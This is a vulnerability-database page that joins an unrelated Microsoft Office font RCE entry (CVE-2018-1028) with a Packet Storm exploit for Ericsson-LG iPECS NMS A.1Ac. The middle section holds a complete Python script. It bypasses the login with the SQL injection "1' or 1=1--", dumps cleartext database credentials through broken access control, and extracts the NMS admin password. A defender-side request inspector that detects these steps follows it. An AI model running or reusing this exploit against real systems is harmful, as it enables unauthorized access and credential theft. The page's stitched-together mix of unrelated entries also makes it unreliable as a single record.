Published: 2018-04-11 21:29:10
Revised: 2018-05-21 13:56:23

[Original] A remote code execution vulnerability exists when the Office graphics component improperly handles specially crafted embedded fonts, aka "Microsoft Office Graphics Remote Code Execution Vulnerability." This affects Word, Microsoft Office, Microsoft SharePoint, Excel, Microsoft SharePoint Server.



- CVSS (base score)

CVSS score: 9.3 [Severe (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may result in a complete system outage]
Access complexity: MEDIUM [exploitation requires certain access conditions]
Access vector: NETWORK [the attacker needs neither intranet nor local access]
Authentication: NONE [exploitation requires no authentication]

- CWE (weakness category)

CWE-94 [Improper Control of Generation of Code ('Code Injection')]

- CPE (affected platforms and products)


- OVAL (technical details for detection)


- Official database links
(official data source) MITRE
(official data source) NVD

- Other links and resources

- Vulnerability information (F147351)

Ericsson-LG iPECS NMS A.1Ac Credential Disclosure (PacketStormID:F147351)
2018-04-25 00:00:00
Berk Cem Goksel  
exploit,vulnerability,info disclosure

Ericsson-LG iPECS NMS version A.1Ac suffers from a cleartext credential disclosure vulnerability.

# -*- coding: utf-8 -*-
# Exploit Title: Ericsson-LG iPECS NMS - Cleartext Cred. Dump
# Vendor Notification: 03-03-2018 - No response
# Initial CVE: 04-04-2018
# Disclosure:  21-04-2018
# Exploit Author: Berk Cem Göksel
# Contact: ||
# Vendor Homepage:
# Version: A.1Ac and possibly earlier
# Tested on: Windows 2008 R2 x64
# CVE-2018-9245:  Multiple SQL injections
# CVE-2018-10285: Incorrect access control
# CVE-2018-10286: Sensitive information disclosure
# The Ericsson-LG iPECS NMS version A.1Ac and possibly earlier disclose sensitive
# information such as cleartext database and NMS login credentials, use incorrect
# access control mechanisms, are vulnerable to MiTM attacks and are prone to
# SQL injection attacks on multiple parameters.
# This script dumps some sensitive information.
# Why use it?
# Normally, you can bypass the login through the SQLi but will get "kicked out".
# Thankfully, we can leverage this to extract the actual admin credentials for
# the web app. In order to do this, we must first dump the database
# credentials in cleartext.
# Usage = python IP_address port
# Example = python 80
from sys import argv
import sys
import re
import requests

if len(argv) != 3:
    print("The script takes two mandatory arguments.")
    print("\nExample usage:  python 80")
    sys.exit(1)

# Target host and port come from the command line.
IP = argv[1]
port = argv[2]

# Log in through SQLi. Otherwise the next POST request is rejected.
sqli_path = "/nms/php/module/main/main_login.php"
sqli_url = "http://" + IP + ":" + port + sqli_path
sqli_cookies = {"mainTab_selectedChild": "sysinfoTab"}
sqli_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"}
sqli_data = {"id": "1", "passwd": "1' or 1=1--"}
r = requests.post(sqli_url, headers=sqli_headers, cookies=sqli_cookies, data=sqli_data)
print(r.status_code, r.reason)

# Thanks to incorrect access control we can
# dump cleartext database credentials
dump_path = "/nms/php/module/main/main_start.php"
dump_url = "http://" + IP + ":" + port + dump_path
nms_cookie = {"mainTab_selectedChild": "sysinfoTab"}
nms_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
nms_data = {"command": "nms_start", "client_id": "20"}
r2 = requests.post(dump_url, headers=nms_headers, cookies=nms_cookie, data=nms_data)
print(r2.status_code, r2.reason)
db_cred_dump = r2.text

# Extract db user and db pass from the dump
m = re.search(r"db_user:'(.*)'.*db_pwd:'([^']*)", db_cred_dump)
if m is not None:
    postgre_db_user = m.group(1)
    postgre_db_pwd = m.group(2)
else:
    print("Something went wrong parsing the credentials. Check the dump manually.")
    sys.exit(1)

client_id = "2"  # Doesn't really matter
user_id = "10"  # Doesn't matter either
db_user = postgre_db_user  # This does matter
db_pwd = postgre_db_pwd  # So does this

# Use db user and password to extract admin credentials for the NMS
users_path = "/nms/php/module/init/module_init.php"
users_url = "http://" + IP + ":" + port + users_path
users_cookies = {"mainTab_selectedChild": "sysinfoTab"}
users_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
users_data = {"command": "init_configuration", "client_id": client_id, "user_id": user_id, "db_user": db_user, "db_pwd": db_pwd, "mfimSeq": "0", "req_system_id": "0", "req_system_name": ''}
r3 = requests.post(users_url, headers=users_headers, cookies=users_cookies, data=users_data)
print(r3.status_code, r3.reason)
user_dump = r3.text

print("Done. You can log in to the postgresql database using the below credentials.")
print("\ndb_user: " + postgre_db_user)
print("db_pwd: " + postgre_db_pwd)
print("\nAnd/Or you can log in to the NMS using the following credentials")
m1 = re.search(r"userList:\[\[\d,'([^']*)','([^']*)", user_dump)
if m1 is not None:
    nms_admin = m1.group(1)
    nms_pwd = m1.group(2)
    print("\nnms_admin: " + nms_admin)
    print("nms_pwd: " + nms_pwd)
else:
    print("\nDid not get nms_admin and nms_pwd. Check the dump manually.")

# Write both raw responses so users and groups can be reviewed by hand.
with open("ipecsnms_dump.txt", "w") as dumpfile:
    dumpfile.write(db_cred_dump)
    dumpfile.write("\n")
    dumpfile.write(user_dump)
print("\nRaw output written to ipecsnms_dump.txt for further username and group enumeration.")
print("Have fun!")
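A defender-side request inspector for the three request patterns the script above depends on, added here as an example that is not part of the advisory or the vendor's product: it flags SQL metacharacters in the main_login.php credentials, a nms_start call to main_start.php without a session, and database credentials carried in an init_configuration form. The session cookie name PHPSESSID is an assumption; the paths, commands and field names are the advisory's.

```python
import re
from urllib.parse import parse_qs

# Paths, commands and field names are taken from the advisory above.
LOGIN_PATH = "/nms/php/module/main/main_login.php"
START_PATH = "/nms/php/module/main/main_start.php"
INIT_PATH = "/nms/php/module/init/module_init.php"
SESSION_COOKIE = "PHPSESSID"  # assumed cookie name, adjust per deployment

# A quote followed by a boolean operator, or a comment/statement terminator,
# as in the advisory's "1' or 1=1--" payload.
SQLI_RE = re.compile(r"'\s*(or|and)\b|--|/\*|;", re.IGNORECASE)

def inspect_request(method, path, body, cookies):
    """Return finding tags for one request; body is the raw
    application/x-www-form-urlencoded string, cookies a dict."""
    findings = []
    if method != "POST":
        return findings
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if path == LOGIN_PATH:
        for field in ("id", "passwd"):
            if SQLI_RE.search(form.get(field, "")):
                findings.append("sqli-login:" + field)
    elif path == START_PATH and form.get("command") == "nms_start":
        if SESSION_COOKIE not in cookies:
            findings.append("unauth-nms_start")
    elif path == INIT_PATH and form.get("command") == "init_configuration":
        if form.get("db_user") or form.get("db_pwd"):
            findings.append("db-creds-in-request")
    return findings

# Constructed sample traffic: the advisory's three steps plus a benign login.
SAMPLE = [
    ("POST", LOGIN_PATH, "id=1&passwd=1%27+or+1%3D1--", {}),
    ("POST", START_PATH, "command=nms_start&client_id=20", {}),
    ("POST", INIT_PATH, "command=init_configuration&db_user=u&db_pwd=p", {}),
    ("POST", LOGIN_PATH, "id=admin&passwd=Winter2018", {"PHPSESSID": "s1"}),
]

def scan(requests_seq=SAMPLE):
    """Run the inspector over a request list; returns (path, findings) pairs."""
    return [(p, inspect_request(m, p, b, c)) for m, p, b, c in requests_seq]

if __name__ == "__main__":
    for path, findings in scan():
        print(path, findings or "ok")
```

The third rule is worth keeping even after the SQLi and access-control bugs are patched: database credentials should never travel in a browser form field at all.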


- Vulnerability information

Microsoft Office CVE-2018-1028 Remote Code Execution Vulnerability
Class: Design Error (Bugtraq ID 103641)
Remote: Yes / Local: No
Published: 2018-04-10 12:00:00 / Updated: 2018-04-10 12:00:00
Credit: Jaanus Kaap of Clarified Security

- Affected program versions

Microsoft Word Automation Services on Microsoft SharePoint Server 2013 Service Pack 1
Microsoft Word Automation Services on Microsoft SharePoint Server 2010 SP2
Microsoft SharePoint Server 2013 SP1
Microsoft SharePoint Enterprise Server 2016
Microsoft Office Web Apps Server 2013 SP1
Microsoft Office Web Apps 2010 SP2
Microsoft Office 2016 (64-bit edition)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Excel Services on Microsoft SharePoint Enterprise Server 2013 Service Pack 1

- Vulnerability discussion

Microsoft Office is prone to a remote code-execution vulnerability.

An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial of service conditions.

- Exploitation

Currently, we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, please mail us at:

- Solution

- References